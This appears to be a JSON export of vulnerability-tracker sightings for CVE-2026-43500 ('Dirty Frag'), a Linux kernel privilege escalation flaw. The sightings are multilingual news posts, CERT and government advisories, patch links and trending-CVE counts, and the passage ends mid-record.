"content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks\nhttps://www.securityweek.com/new-dirty-frag-linux-vulnerability-possibly-exploited-in-attacks/\n\nAlso called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was released.\nThe post New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks (https://www.securityweek.com/new-dirty-frag-linux-vulnerability-possibly-exploited-in-attacks/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2026-05-11T09:33:57.000000Z"}, {"uuid": "8c3f3c5a-1ed3-4ae1-be5c-4f2f24b711e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/bdufstecru/3153", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044f RxRPC \u044f\u0434\u0440\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0437\u0430\u043f\u0438\u0441\u044c\u044e \u0437\u0430 \u0433\u0440\u0430\u043d\u0438\u0446\u0430\u043c\u0438 \u0431\u0443\u0444\u0435\u0440\u0430. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438\n\nBDU:2026-06470\nCVE-2026-43500\n\n\u0412 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0442\u044c\u0441\u044f \"\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c LINUX\", \u0438\u0437\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043c\u0435\u0442\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0435 \u0424\u0421\u0422\u042d\u041a \u0420\u043e\u0441\u0441\u0438\u0438, \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0451\u043d\u043d\u043e\u043c 25 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\n\u0414\u043b\u044f Linux:\nhttps://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/\n\n\u0414\u043b\u044f \u041e\u0421 Astra Linux:\nhttps://wiki.astralinux.ru/x/kwCmH\nhttps://wiki.astralinux.ru/x/ogCmH\nhttps://wiki.astralinux.ru/x/qACmH\nhttps://wiki.astralinux.ru/x/pACmH\nhttps://wiki.astralinux.ru/x/pgCmH\n\n\u0414\u043b\u044f Debian GNU/Linux:\nhttps://security-tracker.debian.org/tracker/CVE-2026-43500\n\n\u0414\u043b\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Red Hat Inc.:\nhttps://access.redhat.com/security/cve/cve-2026-43500", "creation_timestamp": "2026-05-12T14:15:44.000000Z"}, {"uuid": "6b73da77-af1e-433a-ad01-0f08187feea6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mllblfmxrm26", "content": "\ud83d\udfe0 CVE-2026-43500 - High (7.8)\n\nIn the Linux kernel, the following vulnerability has been resolved:\n\nrxrpc: Also unshare DATA/RES...\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2026-43500/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-11T12:28:38.155439Z"}, {"uuid": "4198946c-7b8c-4c2f-a0b3-e51f9096fb69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "Telegram/9XqhTISUbDUPo_c26c1BEinqDeNjvDc1gYqinuT1sIOuN_4", "content": "", "creation_timestamp": "2026-05-11T09:00:05.000000Z"}, {"uuid": "d4a78db3-a8ce-493a-b4e7-a837615ca965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/mora.mastodon.uno.ap.brid.gy/post/3mln3wbdkpyt2", "content": "Dirty Frag: Linux Kernel Local Privilege Escalation via ESP and RxRPC\nUnpatched kernel flaw chain (CVE-2026-43284, CVE-2026-43500) enables root escalation on major Linux distributions.\n\nhttps://www.wiz.io/blog/dirty-frag-linux-kernel-local-privilege-escalation-via-esp-and-rxrpc", "creation_timestamp": "2026-05-12T05:52:44.436956Z"}, {"uuid": "a14a8f99-587c-4685-9551-d3d0007aa549", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mlnd2jbodkdu", "content": "Linux\u306e\u65b0\u305f\u306a\u8106\u5f31\u6027\u300cDirty Frag\u300d \u653b\u6483\u3067\u60aa\u7528\u3055\u308c\u3066\u3044\u308b\u53ef\u80fd\u6027\uff08CVE-2026-43284\u3001CVE-2026-43500\uff09 | Codebook\uff5cSecurity News https://codebook.machinarecord.com/threatreport/silobreaker-cyber-alert/45540/", "creation_timestamp": "2026-05-12T08:00:19.267896Z"}, {"uuid": "8f83fa33-4bdb-4919-9310-3cfaff4bd703", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1858", "content": "", "creation_timestamp": "2026-05-10T21:00:00.000000Z"}, {"uuid": "3e07845c-0045-4d19-a7ae-29fafb6a36e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3mlph64kntd2q", "content": "The latest update for #SafeBreach includes \"Dirty Frag Vulnerability (CVE-2026-43284 & CVE-2026-43500): Why Reliable #Linux Privilege Escalation Changes the Defense Equation\".\n\n#Cybersecurity https://opsmtrs.com/41NWGuQ", "creation_timestamp": "2026-05-13T04:19:13.577271Z"}, {"uuid": "e8c2064b-58db-44c3-8fec-f817b85e822e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T20:00:00.000000Z"}, {"uuid": "92d2b65f-1198-45d4-aec0-72f8ab958bf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlrrkr5rym2j", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 134 interactions\nCVE-2026-43500: 99 interactions\nCVE-2026-31431: 73 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46300: 14 interactions\nCVE-2026-42945: 7 interactions\nCVE-2025-8088: 6 interactions\n", "creation_timestamp": "2026-05-14T02:30:34.309154Z"}, {"uuid": "a19e230e-49ed-4350-aaa5-2de5355c512c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlubzmjy2i2u", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 147 interactions\nCVE-2026-43500: 99 interactions\nCVE-2026-31431: 72 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46300: 39 interactions\nCVE-2026-42945: 17 interactions\nCVE-2026-31431: 14 interactions\n", "creation_timestamp": "2026-05-15T02:30:32.089225Z"}, {"uuid": "d0fa5e9c-b3fc-4de3-bc37-2de094af107d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/redhat-linux-kernel-multiple-vulnerabilities_20260508", "content": "", "creation_timestamp": "2026-05-07T20:00:00.000000Z"}, {"uuid": "b66f5d61-8ff7-42c4-86c5-07f9fab949a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.acn.gov.it/portale/w/dirty-frag-rilevata-poc-per-l-elevazione-di-privilegi-in-linux-cve-2026-43284", "content": "", "creation_timestamp": "2026-05-08T04:21:59.000000Z"}, {"uuid": "fbca3de7-8e36-4d1f-a6cb-cdcaad9d3c8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.acn.gov.it/portale/w/dirty-frag-poc-e-sfruttamento-di-vulnerabilita-per-l-elevazione-di-privilegi-in-linux", "content": "Disponibile un Proof of Concept (PoC) per \u201cDirty Frag\u201d, catena di sfruttamento delle vulnerabilit\u00e0 identificate tramite CVE-2026-43284 e CVE-2026-43500, relativa al Kernel Linux. La vulnerabilit\u00e0 interessa i moduli esp4 ed esp6 del sottosistema IPsec, utilizzato per la cifratura del traffico di rete e delle VPN, e il modulo rxrpc, utilizzato dal protocollo di rete AFS. La vulnerabilit\u00e0, qualora sfruttata, potrebbe consentire a un utente non privilegiato, l\u2019ottenimento di privilegi di root.", "creation_timestamp": "2026-05-08T09:21:59.000000Z"}, {"uuid": "e7baa204-961a-4e2e-9101-b0ec1e1a30fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T18:00:00.000000Z"}, {"uuid": "c4a532f5-8436-4d00-8b4b-2027a2d5f1c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlpb3on5ls2s", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 129 interactions\nCVE-2026-43500: 94 interactions\nCVE-2026-31431: 76 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-45185: 8 interactions\nCVE-2026-41940: 5 interactions\nCVE-2026-42208: 5 interactions\n", "creation_timestamp": "2026-05-13T02:30:29.227267Z"}, {"uuid": "a5c2c470-ca17-40d9-b322-92c6b0117dd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116564950057858680", "content": "I put some words all in one place about Copy Fail CVE-2026-31431, Dirty Frag CVE-2026-43284 and CVE-2026-43500, and friends:https://tharros.com/copy-fail-dirty-frag-and-friends-linux-kernel-vulnerability-coordination-in-the-modern-world/", "creation_timestamp": "2026-05-13T02:40:02.278845Z"}, {"uuid": "a3801d8d-f850-4b0e-a0fb-6dd0be3e4a09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/wdormann.infosec.exchange.ap.brid.gy/post/3mlpbmfkh4vz2", "content": "I put some words all in one place about Copy Fail CVE-2026-31431, Dirty Frag CVE-2026-43284 and CVE-2026-43500, and friends:\nhttps://tharros.com/copy-fail-dirty-frag-and-friends-linux-kernel-vulnerability-coordination-in-the-modern-world/", "creation_timestamp": "2026-05-13T02:40:11.692753Z"}, {"uuid": "58ec076b-8726-44e1-a384-f19f547bfdd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/84198", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a dirty_frag_mitigation\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a vorkampfer\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-14 10:15:25\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA bash script for mitigating linux dirtyfrag exploit CVE-2026-43500, and fragnesia\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-14T11:00:04.000000Z"}, {"uuid": "25a29225-de07-45ea-b813-c0f18fce5a00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/true_secator/8202", "content": "\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u043d\u0430\u0434 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 root.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430 \u043a\u0430\u043a\u00a0Fragnasia \u0438 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c CVE-2026-46300.\n\n\u041e\u043d\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 Linux XFRM ESP-in-TCP, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root, \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0431\u0430\u0439\u0442\u044b \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u044f\u0434\u0440\u0430 \u0434\u043b\u044f \u0444\u0430\u0439\u043b\u043e\u0432 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f.\n\n\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0438\u0437 Zellic \u0423\u0438\u043b\u044c\u044f\u043c\u0443 \u0411\u043e\u0443\u043b\u0438\u043d\u0433\u0443, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0435\u043b\u0438\u043b\u0441\u044f PoC, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0449\u0438\u043c \u043f\u0440\u0438\u043c\u0438\u0442\u0438\u0432 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u043f\u0430\u043c\u044f\u0442\u044c \u044f\u0434\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0434\u043b\u044f \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u043a\u044d\u0448\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 /usr/bin/su \u0441 \u0446\u0435\u043b\u044c\u044e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445.\n\n\u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0442\u0438\u043b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u043a\u043b\u0430\u0441\u0441\u0443 Dirty Frag, \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435, \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u044f\u0434\u0440\u0430 Linux, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0434\u043e 13 \u043c\u0430\u044f 2026 \u0433\u043e\u0434\u0430.\n\n\u041a\u0430\u043a \u0438 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 Fragnasia, \u0434\u043b\u044f Dirty Frag \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 PoC, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 root \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux.\n\n\u041e\u0434\u043d\u0430\u043a\u043e Dirty Frag \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0437\u0430 \u0441\u0447\u0435\u0442 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0434\u0432\u0443\u0445 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u044f\u0434\u0440\u0430: \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0439 \u043a\u044d\u0448 xfrm-ESP (CVE-2026-43284) \u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0439 \u043a\u044d\u0448 RxRPC (CVE-2026-43500), \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043f\u0443\u0442\u0435\u043c \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438.\n\nFragnesia \u0445\u043e\u0442\u044c \u0438 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u043a\u043b\u0430\u0441\u0441\u0443 Dirty Frag, \u043d\u043e \u044d\u0442\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 ESP/XFRM, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b \u0432\u044b\u043f\u0443\u0449\u0435\u043d \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447. \u041e\u0434\u043d\u0430\u043a\u043e \u043e\u043d\u0430 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0430 \u0442\u043e\u0439 \u0436\u0435 \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u0438, \u0438 \u043c\u0435\u0440\u044b \u043f\u043e \u0435\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e \u0442\u0430\u043a\u0438\u0435 \u0436\u0435, \u043a\u0430\u043a \u0438 \u0434\u043b\u044f dirtyfrag.\n\n\u041e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 Linux XFRM ESP-in-TCP \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0431\u0430\u0439\u0442\u043e\u0432 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u044f\u0434\u0440\u0430 \u0444\u0430\u0439\u043b\u043e\u0432, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f, \u0431\u0435\u0437 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438.\n\n\u0414\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u0442 \u0430\u0442\u0430\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c Linux \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430 \u0434\u043b\u044f \u0441\u0432\u043e\u0435\u0439 \u0441\u0440\u0435\u0434\u044b \u043b\u0438\u0431\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0442\u043e\u0442 \u0436\u0435 \u043c\u0435\u0442\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b, \u0447\u0442\u043e \u0438 \u0434\u043b\u044f \u043a\u043e\u043c\u0430\u043d\u0434 Dirty Frag, \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 \u044f\u0434\u0440\u0430.\n\n\u041f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e Fragnasia \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u0438\u043c\u0435\u043d\u043d\u043e \u0432 \u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442, \u043a\u043e\u0433\u0434\u0430 \u043f\u0435\u0440\u0435\u0434 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c\u0438 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0441\u0442\u043e\u0438\u0442 \u0434\u0440\u0443\u0433\u0430\u044f \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0437\u0430\u0434\u0430\u0447\u0430 - \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u0442\u044c Copy Fail, \u0435\u0449\u0435 \u043e\u0434\u043d\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c 